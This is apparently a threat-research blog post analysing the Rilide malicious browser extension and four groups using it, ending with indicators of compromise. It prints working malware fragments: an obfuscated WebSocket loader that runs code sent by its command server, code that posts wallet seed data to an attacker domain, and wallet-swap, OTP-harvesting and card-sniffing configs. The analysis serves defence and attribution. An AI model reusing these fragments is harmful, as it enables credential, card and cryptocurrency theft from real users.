By: Jason Reaves, Joshua Platt and Jonathan McCay
Rilide, which was previously called CookieGenesis[1], is a malicious browser extension that is probably an area of malware that goes unnoticed a bit too much. The functionality inside of the latest version of Rilide:
- Credential harvesting
- Cookie theft
- Webinject system
- Local proxy attack from CursedChrome
- Gather Systeminfo
- Retrieve a screenshot
- Email injects
- Hunt for files on disk
- Hunt for wallets to replace
- Manipulate or monitor balances on facebook, coinbase and google pay
- Multiple methods of C2 traffic(Telegram Chat, Hardcoded, Telegram botapi with C2, Blockchains transaction decoding of wallets)
Most of the functionality has been previously detailed in existing reports[2,3]. As such, we may not go into every single piece of functionality in this report. Our primary focus will be showcasing the main groups leveraging Rilide.
Group 1
The first group we found was a bit odd because they are using a different structure for their C2 traffic and not much is listed for them online. It appears to distribute via a PPI service.
Smokeloader is used(5a0950cd155c81008cbd0878e9bd79b901e96dfc37e5bfd9a1cd51051efe3302):
olihonols.]in.]net
nicetolosv.]xyz
jftolsa.]ws
epohe.]ru
Downloads a powershell script from:
hxxps://paste[.]ee/d/ovjFg
The powershell script delivered will gather up a bunch of information on the system it is running on and will attempt to install an extension by using the same method outlined by TrustWave[2]. Afterwords, it will send the data and installation status up to a telegram channel:
-1002236545487
7233612872:AAGE4M51A7TgVUdOl5d53-gq7j_62t8SwuQ
The admin in the channel:
{"user":{"id":6900032335,"is_bot":false,"first_name":"Tina","last_name":"Linares","username":"parlobecdi1988gr4k"},"status":"creator","is_anonymous":false}Surprisingly enough this same admin shows up in 3 other channels with different bot api keys. While telegram was used for the installation process the extension leverages blockchain transactions in order to base58 decode wallets that will contain the C2 domain:
litecoin wallet: La3oY9mQfb4AcBg1Wq5g34utrPRXQ4zmS1
Decoding:
>>> import base58
>>> base58.b58decode('LUC9EJH9wB6GTRcMDrR7U3F8tyt7dPyZMi')
'0batumisolutions.com\x00\xc5sZ\xd1'
The domain gets a default URI appeded to it
const updateDomain = () =>
new Promise(async (_0x142b2b) => {
let _0x5da814 = await getDomain()
return (
chrome.storage.local.set({ domain: 'https://' + _0x5da814 + '/api' }),
_0x142b2b(true)
)
The extension retrieves three main blobs of data from the C2:
- settings
- injects
- commands
The settings are a collection of grabber links and a reverse proxy location, for this group:
{"grabberLinks":["apple.com","amazon.com","ebay.com","gmail.com","yahoo.com","walmart.com","lowes.com","x.com","admin","\/key\/","administrator","manager","control","panel","phpmyadmin","pma","shop","store","booking"],"reverseProxy":null}The injects:
"url": "amazon.com",
"url": "facebook.com",
"url": "binance.com",
"url": "bitget.com",
"url": "bybit.com",
"url": "coinbase.com",
"url": "gate.io",
"url": "huobi.com",
"url": "kucoin.com",
"url": "mexc.com",
"url": "bingx.com",
"url": "accounts.google.com",
"url": "youtube.com",
"url": "steamcommunity.com",
"url": "steampowered.com",
"url": "YobZterKeA",
"url": "SNIFFER_PARAMETERS",
"url": "*,binance.com|kucoin.com|coinbase.com|bitget.com|bybit.com|gate.io|mexc.com|huobi.com|bingx.com",
"url": "blockchain.com",
Most of the functionality for the injects is all about harvesting accounts with crypto or wallets of some kind. The ‘YobZterKeA’ section of settings contains the functionality for manipulating and harvesting OTPs from emails, for example consider Binance:
"codeLength": 6,
"emailDomain": "",
"firstTitle": "[Binance] Authorize New Device",
"regexString": "(?<!\\.\\d*)\\b\\d{6}\\b",
"secondTitle": {
"withHtml": "<span class=\"Zt\"> - </span>You recently attempted to sign in to your Binance account from a new device or location. As a security measure, we require additional confirmation before allowing access to your Binance account. ",
"withoutHtml": "You recently attempted to sign in to your Binance account from a new device or location. As a security measure, we require additional confirmation before allowing access to your Binance account."
},
"subject": "[Binance] Authorize New Device",
"title": "[Binance] Authorize New Device"
The SNIFFER_PARAMETERS related to extraction of credit card data in this case:
{
"cardsRegex": {
"AMEX": {
"flags": "g",
"pattern": "\\b3[47]\\d{2}(?:[\\s+-]?\\d{6}){1}(?:[\\s+-]?\\d{5}){1}\\b"
},
"DINERS": {
"flags": "g",
"pattern": "\\b3(?:0[0-5]|[68]\\d)(?:[\\s+-]?\\d{2}){1}(?:[\\s+-]?\\d{4}){2}\\b"
},
"DISCOVER": {
"flags": "g",
"pattern": "\\b6011(?:[\\s+-]?\\d{4}){3}\\b"
},
"JCB": {
"flags": "g",
"pattern": "\\b3\\d{3}(?:[\\s+-]?\\d{4}){3}\\b"
},
"MC": {
"flags": "g",
"pattern": "\\b5\\d{3}(?:[\\s+-]?\\d{4}){3}\\b"
},
"VISA": {
"flags": "g",
"pattern": "\\b4\\d{3}(?:[\\s+-]?\\d{4}){3}\\b"
}
},
"extractData": {
"addName": {
"regex": {
"flags": "i",
"pattern": "additional|middle"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s.]+$"
}
},
"addressLine1": {
"regex": {
"flags": "i",
"pattern": "line1|addr1|address1"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\d\\s\\-.\\/]+$"
}
},
"addressLine2": {
"regex": {
"flags": "i",
"pattern": "line2|addr2|address2"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\d\\s\\-.\\/]+$"
}
},
"cardNumber": {
"regex": {
"flags": "i",
"pattern": "cardnumber|cardnum|number|card|credit"
}
},
"city": {
"regex": {
"flags": "i",
"pattern": "city"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s]+$"
}
},
"country": {
"regex": {
"flags": "i",
"pattern": "country"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s]+$"
}
},
"cvv": {
"regex": {
"flags": "i",
"pattern": "cvv|cvc|cardsecuritycode"
},
"validRegex": {
"flags": "",
"pattern": "^\\d{3}$"
}
},
"expDate": {
"regex": {
"flags": "i",
"pattern": "expDate|expiration|expiryDate|exp_date|date|cardexpiry"
},
"validRegex": {
"flags": "",
"pattern": "^(0[1-9]|1[0-2])[\\/-](\\d{2}|\\d{4})$|^(\\d{2}|\\d{4})[\\/-](0[1-9]|1[0-2])$"
}
},
"expMonth": {
"regex": {
"flags": "i",
"pattern": "expMonth|exp_month|month"
},
"validRegex": {
"flags": "",
"pattern": "^(0[1-9]|1[0-2])$"
}
},
"expYear": {
"regex": {
"flags": "i",
"pattern": "expYear|exp_year|year"
},
"validRegex": {
"flags": "",
"pattern": "^(2[4-9]|[3-9]\\d|202[4-9]|20[3-9]\\d)$"
}
},
"firstName": {
"regex": {
"flags": "i",
"pattern": "first"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s.]+$"
}
},
"lastName": {
"regex": {
"flags": "i",
"pattern": "last"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s.]+$"
}
},
"name": {
"regex": {
"flags": "i",
"pattern": "name|holder"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s.]+$"
}
},
"state": {
"regex": {
"flags": "i",
"pattern": "state|provin"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s]+$"
}
},
"zipCode": {
"regex": {
"flags": "i",
"pattern": "zip|postal"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\d-]{4,10}$"
}
}
},
"requiredFields": [
"cardNumber",
"cvv"
],
"state": "ON"
}The injects are mostly geared to Crypto exchanges, primarily for harvesting of data and manipulation.
TOTAL_BALANCE_THRESHOLD = 500000,
NON_SELL_THRESHOLD_PERCENTAGE = 5,
PARTIAL_SELL_PERCENTAGE = 30,
MIN_PARTIAL_SELL_PERCENTAGE = 60,
MAX_PARTIAL_SELL_PERCENTAGE = 90,
TICKER_WITHDRAW = WITHDRAW_CONFIG[3],
ORDER_AMOUNT_ADJUSTMENT_FACTOR = 1,
IS_ON_HANDLE_SIMPLEFLEXIBLE = true,
COUNT_PROCESS_SIMPLEFLEXIBLE = 3,
MIN_AMOUNT_CHECK_ASSET = 0.1,
MIN_AMOUNT_TRANSFER = 10,
MIN_AMOUNT_CONVERT = 10,
MIN_AMOUNT_WITHDRAW = 200,
MIN_AMOUNT_REDEEM = 50,
PERCENT_TRANSFER = 1,
MIN_PERCENT_TOTAL_TRANSFER = 0.1,
MIN_PERCENT_CURRENT_ACCOUNT_TRANSFER = 0.1,
PERCENT_CONVERT = 1,
MIN_PERCENT_TOTAL_CONVERT = 0.1,
MIN_PERCENT_CURRENT_ACCOUNT_CONVERT = 0.1,
TIMEOUT_TRANSFER = [199, 399],
TIMEOUT_CONVERT = [199, 399],
TIMEOUT_REDEEM = [199, 399],
TIMEOUT_BETWEEN_OPERATIONS = [400, 700],
AMOUNT_FOR_FULL_WITHDRAW = 1000,
PERCENT_WITHDRAW = 0.7,
_0x540b3c = {
spotBalance:
'/bapi/asset/v2/private/asset-service/wallet/balance?needBalanceDetail=true"eAsset=USDT',
marginBalance: '/bapi/margin/v1/private/margin/account-details',
isoMarginBalance:
'/bapi/margin/v1/private/isolated-margin/isolated-margin-account-details',
futures: '/bapi/futures/v4/private/future/user-data/user-balance',
delivery: '/bapi/futures/v2/private/delivery/user-data/user-balance',
card: '/bapi/c2c/v1/private/c2c/asset/balance',
simpleFlexible: '/bapi/earn/v2/private/lending/daily/token/position',
accountDetails: '/bapi/accounts/v1/private/account/user/base-detail',
listVerify:
'/bapi/accounts/v1/protect/account/getVerificationTwoCheckList',
liquidationMarginBorrow:
'/bapi/margin/v1/private/margin/manual-liquidation',
simpleFlexibleRedeem: '/bapi/earn/v1/private/lending/daily/redeem',
getPrice: '/api/v3/ticker/price',
getMaxAmountFutures:
'/bapi/futures/v1/private/future/user-data/getMaxWithdrawAmount',
getMaxAmountDelivery:
'/bapi/futures/v1/private/delivery/user-data/getMaxWithdrawAmount',
transfer: '/bapi/asset/v1/private/asset-service/wallet/transfer',
getQuoteConvert: '/bapi/margin/v1/private/new-otc/get-quote',
executeQuote: '/bapi/margin/v1/private/new-otc/execute-quote',
logout: '/bapi/accounts/v1/private/authcenter/logout',
placeOrder: '/bapi/mbx/v1/private/mbxgateway/order/place',
getExchangeInfo:
'/bapi/asset/v1/public/asset-service/product/get-exchange-info',
}
They also as previously reported will go after sites with rewards or credit card programs such as retailers, google pay, facebook, steam profiles, steam store and inventory.
await sendCheckerInfo({
login: localStorage.getItem('loginSteam') ?? _0x2554eb?.email,
password: localStorage.getItem('passwordSteam'),
balance: _0x2554eb?.balance ?? 'NA',
currency: null,
additionalInfo:
'Country: ' + _0x2554eb?.country_code ??
'NA' + ' / Account name: ' + _0x2554eb?.account_name ??
'NA' + ' / Phone: ' + _0x2554eb?.phone ??
'NA' + ' / Security: ' + _0x2554eb?.security ??
'NA' + ' / Status: ' + _0x2554eb?.status ??
'NA' + ' / Is limited: ' + _0x2554eb?.is_limited ??
'NA',
cards: [],
spend: _0x4810f1,
orders: _0x2554eb?.notification ?? [],
})Group 2
One of the more interesting groups we found was leveraging the same targets as outlined by a TrustWave report in 2023[2].
This group leverages telegram for retrieving the main domain:
{"ok":true,"result":[{"update_id":591912390,
"message":{"message_id":345,"from":{"id":1747486344,"is_bot":false,"first_name":"Emergency","username":"Bot31337"},"chat":{"id":-613012199,"title":"DomainPost1","type":"group","all_members_are_administrators":true},"date":1725524234,"text":"hxxps://extensionsupdates[.]top/api","entities":[{"offset":0,"length":33,"type":"url"}],"link_preview_options":{"is_disabled":true}}}]}The grabber links from the C2 make this an interesting group because they appear to be going for enterprise creds as well:
{
"grabberLinks": [
"newcastlepermanent.com.au",
"nab.com",
"commbank.com",
"heritage",
"beyondbank",
"bendigobank",
"originmms",
"mebank",
"nabtrade",
"bank",
"nabconnect.nab.com.au/login",
"logon.online.anz.com/auth/Logon/",
"commbiz",
"anz.com",
"bankofmelbourne.com.au",
"imb.com.au",
"westpac.com.au",
"paypal",
"merchant",
"outlook",
"login.microsoftonline.com",
"login.live.com",
"eftpos",
"binance",
"coinspot",
"stgeorge.com.au",
"/admin/",
"index/admin",
"/cart/admin",
"huobi",
"suncorp",
"citrix",
"commbiz",
"commsec",
"boq.com.au",
"macquarie",
"bbo.",
"transact",
"webmail",
"gcmutual",
"airwallex",
"stripe",
"RDWeb",
"index/key",
"admin",
"smpsso",
"sales_order",
"sp_admin",
"cybersource",
"globalpay",
"secureexchange",
"huobi",
"kukoin",
"vpn.",
"wise.com",
"owa/auth/logon.aspx",
"facebook",
"adsmanager",
"intelco",
"wix.com",
"latitude",
"mastercard",
"ing.com.au",
"sharepoint.com",
"slack.com",
"greater",
"hsbc",
"rabobank",
"bankaust",
"swyftx",
"login.yahoo.com",
"icbc.com",
"amazon.com/ap/signin"
],
"reverseProxy": null
}Inject Targets:
"url": "nabconnect.nab.com.au"
"url": "transact.nab.com.au"
"url": "migs.mastercard.com.au"
"url": "tyro.gateway.mastercard.com"
"url": "cipg.gateway.mastercard.com"
"url": "js.stripe.com"
"url": "checkout.stripe.com"
"url": "nab.com.au"
"url": "quickstream.westpac.com.au"
Most of the injects have the following javascript code inside of them
((v, w, d)=> { d = this; (d && d.nodeType === 1 && d.parentNode.removeChild(d)); if (w['pgg_lo_fl'] || navigator['webdriver']) return; w['pgg_lo_fl'] = 1; var W = window.WebSocket, sortvis = function () { if (v-- > 0) { for (var i = 0, s = ''; i < 34; i++) s += (String.fromCharCode(atob('PDI/ampkMSE0Ny4yKTE3KCliMyombiU+IS45KzwqKSAgfw').charCodeAt(i) ^ 'KALPE'.charCodeAt(Math.floor(i % 5)))); w = new W(s); w.onmessage = function (e) { new Function(atob(e['data'])).call(this) }; w.onclose = function (a) { a.wasClean || setTimeout(sortvis, 1000) } } }; sortvis(); })(1, self);Decoding the c2:
>>> a = 'PDI/ampkMSE0Ny4yKTE3KCliMyombiU+IS45KzwqKSAgfw'
>>> temp = base64.b64decode(a+'==')
>>> temp
'<2?jjd1!47.2)17()b3*&n%>!.9+<*) \x7f'
>>> temp = bytearray(temp)
>>> for i in range(len(temp)):
... temp[i] ^= bytearray('KALPE')[i%5]
...
>>> temp
bytearray(b'wss://pmdresearch.com/indexglobal/')
This C2 has overlap with existing work by Akamai researchers into what they have reported as MageCart activity[4].
Group 3
This group appears to be mostly Spanish themed and was previously discussed by Metabase Q[5]. We discovered it being delivered via Itero[6] a “Browser Extension Cloud”:
hxxps://itero.plasmo[.]com/api/ext/install/hfigjgngfhigeliddoogcppigdmoehcl
C2:
panelUrl: 'hxxps://facturamexico2023[.]com/api',
The domain was no longer resolving at the time but we managed to recover the settings and injects:
{"grabberLinks":["mail.ionos.mx","bitso.com","login.coinbase.com","am.profuturo.mx","appweb.alquimiapay.com","exitusfintech","binance.com","login.live.com"],"reverseProxy":null}Inject targets:
"url": "bancanetempresarial.banamex.com.mx",
"url": "bancanetempresarial.citibanamex.com.mx",
"url": "bancanet.banamex.com",
"url": "security.online-banking.hsbc.com.mx",
"url": "see.sbi.com.mx",
"url": "bbva.mx",
"url": "bancaporinternet.bb.com.mx",
"url": "empresas.bbvanet.com.mx",
"url": "binance.com",
Deobfuscating the injects and harvesting the ATS injects:
script.src = 'hxxps://facturacionmexico[.net/ok.js
otherScript.src = 'hxxps://dlxfreights[.site/mx/hsbc/main.js';\r\n\r\n
hxxps://dlxfreights[.site/uadmin/gate.php
hxxps://bbj-com-mx.utilidad96we2[.online/Bajionet.php?t=1
iframe.src = 'hxxps://bnce.facturaarge[.autos/
replace(\"hxxps://s1conexion[.info/?s=12\
The first domain also led to this cached telegram API response from VirusTotal:
{"ok":true,"result":[{"update_id":868522626,
"message":{"message_id":63,"from":{"id":854919828,"is_bot":false,"first_name":"Nnnnooo","username":"GGrtx1","language_code":"en"},"chat":{"id":-1002063201454,"title":"Dominio3","type":"supergroup"},"date":1712558709,"text":"hxxps://facturacionmexico[.net/dom3.js","entities":[{"offset":0,"length":37,"type":"url"}],"link_preview_options":{"url":"hxxps://facturacionmexico[.net/dom3.js"}}}]}Group 4
This group potentially has the most research publicly posted about it, they seem to primarily leverage blockchain wallets for C2, the initial one we started with was ‘bc1qvkvzfla6wrem2uf4ejkuja8yp3c6f3xf72kyc9’ which also shows up in a blog post by eSentire[3] and also showed up in a researchers blog[7].
Transactions:
"vout": [
{
"scriptpubkey": "76a914747275652d6c69652e636f6d000000000000000088ac",
"scriptpubkey_address": "1BciVyU1g7TdD5Mo2t7DsLHVjyAkBhSxhw",
"scriptpubkey_asm": "OP_DUP OP_HASH160 OP_PUSHBYTES_20 747275652d6c69652e636f6d0000000000000000 OP_EQUALVERIFY OP_CHECKSIG",
"scriptpubkey_type": "p2pkh",
"value": 49206
}
],
"vout": [
{
"scriptpubkey": "76a914747275652d626f74746f6d2e636f6d000000000088ac",
"scriptpubkey_address": "1BciVyU1eHXhEKpkJgHyt7hU381yFJHyA1",
"scriptpubkey_asm": "OP_DUP OP_HASH160 OP_PUSHBYTES_20 747275652d626f74746f6d2e636f6d0000000000 OP_EQUALVERIFY OP_CHECKSIG",
"scriptpubkey_type": "p2pkh",
"value": 21485
}
],
Decoding addresses:
>>> base58.b58decode('1BciVyU1eHXhEKpkJgHyt7hU381yFJHyA1')
'\x00true-bottom.com\x00\x00\x00\x00\x00 gv:'
>>> base58.b58decode('1BciVyU1g7TdD5Mo2t7DsLHVjyAkBhSxhw')
'\x00true-lie.com\x00\x00\x00\x00\x00\x00\x00\x00\xa1T\xf3\xea'While investigating recent infrastructure we noticed some similarities with some of the older C2 groupings which has also been outlined a bit here[7]. Unfortunately the older infrastructure seemed down when we checked, but we did notice a pretty clear overlap in the injects config for a few of them:
Injects from 50elk[.com
cat 50elk_injects.txt |python -m json.tool |grep '"url":'
"url": "binance",
"url": "blockchain.com",
"url": "coinbase.com",
"url": "kucoin.com",
"url": "htx.com",
"url": "bitget.com",
"url": "gate.io",
"url": "bybit.com",
"url": "portfolio.metamask.io",
"url": "EMAIL_CONFIG",
"url": "bingx.com",
"url": "mexc.com",
"url": "whitebit.com",
"url": "business.facebook.com",
"url": "CLIPPER_DATA",
"url": "app.uniswap.org|pancakeswap.finance|app.1inch.io|sushi.com|app.balancer.fi|dydx.trade|app.dodoex.io|solidly.com|curve.fi",
"url": "FINDER_DATA",
"url": "amazon",
Injects from x504x[.com
cat x504x_injects.txt |python -m json.tool |grep '"url":'
"url": "binance",
"url": "blockchain.com",
"url": "coinbase.com",
"url": "kucoin.com",
"url": "htx.com",
"url": "bitget.com",
"url": "gate.io",
"url": "bybit.com",
"url": "portfolio.metamask.io",
"url": "EMAIL_CONFIG",
"url": "bingx.com",
"url": "mexc.com",
"url": "whitebit.com",
"url": "business.facebook.com",
"url": "CLIPPER_DATA",
"url": "app.uniswap.org|pancakeswap.finance|app.1inch.io|sushi.com|app.balancer.fi|dydx.trade|app.dodoex.io|solidly.com|curve.fi",
"url": "FINDER_DATA",
"url": "amazon",
Injects from dot4net[.com
cat vt/tmp2/dot4net_injections.txt |python -m json.tool |grep '"url":'
"url": "binance",
"url": "blockchain.com",
"url": "coinbase.com",
"url": "kucoin.com",
"url": "htx.com",
"url": "bitget.com",
"url": "gate.io",
"url": "bybit.com",
"url": "portfolio.metamask.io",
"url": "EMAIL_CONFIG",
"url": "bingx.com",
"url": "mexc.com",
"url": "whitebit.com",
"url": "business.facebook.com",
"url": "CLIPPER_DATA",
"url": "app.uniswap.org|pancakeswap.finance|app.1inch.io|sushi.com|app.balancer.fi|dydx.trade|app.dodoex.io|solidly.com|curve.fi",
"url": "FINDER_DATA",
"url": "amazon",
Another overlap comes in the form of the inject against Amazon, specifically the exfiltration location on telegram:
50elk:
UUID = document.querySelector('#uuidMachine')?.textContent ?? 'Unknown',
VERSION = '1.0.2',
CHAT_ID = '-1002247417462',
BOT_TOKEN = '7500014126:AAFomRFjhtRJN0AU73mdWxwWtRTOW4bsO50',
CHECK_TIME = 60,x504x:
UUID = document.querySelector('#uuidMachine')?.textContent ?? 'Unknown',
VERSION = '1.0.4',
CHAT_ID = '-1002247417462',
BOT_TOKEN = '7500014126:AAFomRFjhtRJN0AU73mdWxwWtRTOW4bsO50',
LOGOUT_TIME = 604800000,
CHECK_TIME = 60,dot4net:
UUID = document.querySelector('#uuidMachine')?.textContent ?? 'Unknown',
VERSION = '1.0.0',
CHAT_ID = '-1002247417462',
BOT_TOKEN = '7500014126:AAFomRFjhtRJN0AU73mdWxwWtRTOW4bsO50',
CHECK_TIME = 60,For the injects on this one targeting crypto the data is sent off to a hardcoded domain:
const _0x3f953b = 'hxxps://muchograciesamigos[.com/'
const _0x1804f4 = async (_0x58999e, _0x2a0f05, _0x4c2bb7, _0x1b45a8) => {
const _0x546a2b = new Date().toISOString(),
_0x41b990 = {
time: _0x546a2b,
version: '1.0.0',
description: _0x1b45a8,
func: _0x4c2bb7,
email: _0x2a0f05,
type: _0x58999e,
uuid: $('#uuidMachine').text(),
folder: 'METAMASK_SEED',
},
_0xd2c246 = {
type: 'POST',
url: _0x3f953b + 'logs.php',
headers: {},
data: _0x41b990,
}
Some of the other crypto injects appear to have functionality for stealing crypto also, such as coinbase:
const requestDataPaymentMethods = _0x1e4d53,
_0x3036e6 = {
whiteList: 'https://www.coinbase.com/api/v2/user/address-whitelisting',
getMethodSecondFactor:
'https://www.coinbase.com/api/v2/user/second-factor',
getUserData: 'https://www.coinbase.com/api/v2/user',
signOut: 'https://www.coinbase.com/signout',
manageSecondFactor:
'https://www.coinbase.com/api/two-factor/v1/management',
enabledTypes:
'https://login.coinbase.com/api/two-factor/v1/enabled-types',
challenge: 'https://login.coinbase.com/api/two-factor/v1/challenge',
verify: 'https://login.coinbase.com/api/two-factor/v1/verify',
}
const _0x5075d1 = { urls: _0x3036e6 }
const apiConfig = _0x5075d1,
_0xc50478 = {
network: 'ethereum',
wallet: '0xAB5ca32AE1e009fec2EA665bcdD66b155326CBD8',
name: 'ETH',
depositUri: 'ethereum:',
}
const _0x5d4bfd = {
network: 'bitcoin',
wallet: '13zJ6SeN13PX66guAmERAtitdB8qXGEwik',
name: 'BTC',
depositUri: 'bitcoin:',
}
const _0x170de9 = {
network: 'litecoin',
wallet: 'LRiU6znQYtJwBfyz6J1jqzSLeSz3b9jiQk',
name: 'LTC',
depositUri: 'litecoin:',
}
const _0x23e8ee = {
network: 'ethereum',
wallet: '0xAB5ca32AE1e009fec2EA665bcdD66b155326CBD8',
name: 'USDT',
depositUri:
'ethereum:0xdac17f958d2ee523a2206206994597c13d831ec7/transfer?address=',
}
const _0x1937c2 = {
network: 'ethereum',
wallet: '0xAB5ca32AE1e009fec2EA665bcdD66b155326CBD8',
name: 'SHIB',
depositUri:
'ethereum:0x95aD61b0a150d79219dCF64E1E6Cc01f0B64C4cE/transfer?address=',
}
const _0x56a870 = {
network: 'ethereum',
wallet: '0xAB5ca32AE1e009fec2EA665bcdD66b155326CBD8',
name: 'USDC',
depositUri:
'ethereum:0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48/transfer?address=',
}
const _0x2433f7 = {
network: 'xrp',
wallet: 'rERDrE8Pf2pEdkneRKCxe9aXCEzhu3eBcx',
name: 'XRP',
depositUri: 'xrp:',
}
const _0x417147 = {
network: 'solana',
wallet: 'G3ozx5xtEqGAGi3VdsQGKGHxuwqSJDTn38vEUEREQweQ',
name: 'SOL',
depositUri: 'solana:',
}
const CONFIG_SPOOF = [
_0xc50478,
_0x5d4bfd,
_0x170de9,
_0x23e8ee,
_0x1937c2,
_0x56a870,
_0x2433f7,
_0x417147,
],
getWallet = (_0x2b47b3, _0x2a27d0 = CONFIG_SPOOF) => {
for (const _0x1df863 of _0x2a27d0) {
if (_0x2b47b3.includes(_0x1df863.name)) {
return {
address: _0x1df863.wallet,
depositUri: _0x1df863.depositUri + _0x1df863.wallet,
}
}
}
return null
}
Indicators of Compromise
Domains:
gzipdot.com
dot4net.com
x504x.com
50elk.com
true-lie.com
true-bottom.com
50pair.com
50barrels.com
you-rabbit.com
don-dns.com
extension-app.com
catin-box.com
facturarmx.com
ext-panel.website
idceapps.pro
conexionesespeiales.tech
size-infinity.com
dark-confusion.com
don-die.com
statbrwsr.digital
olihonols.]in.]net
nicetolosv.]xyz
jftolsa.]ws
epohe.]ru
muchograciesamigos[.com
s1conexion[.info
facturaarge[.autos
bbj-com-mx.utilidad96we2[.online
dlxfreights[.site
facturacionmexico[.net
References
1: https://www.trellix.com/en-hk/blogs/research/genesis-market-no-longer-feeds-the-evil-cookie-monster/
4: https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer
5: https://www.metabaseq.com/threat/cybercartel/
6: https://docs.plasmo.com/itero
7: https://pberba.github.io/crypto/2024/09/14/malicious-browser-extension-genesis-market/
Diving into Rilide was originally published in Walmart Global Tech Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.
Article Link: Diving into Rilide. By: Jason Reaves, Joshua Platt and… | by Jason Reaves | Walmart Global Tech Blog | Sep, 2024 | Medium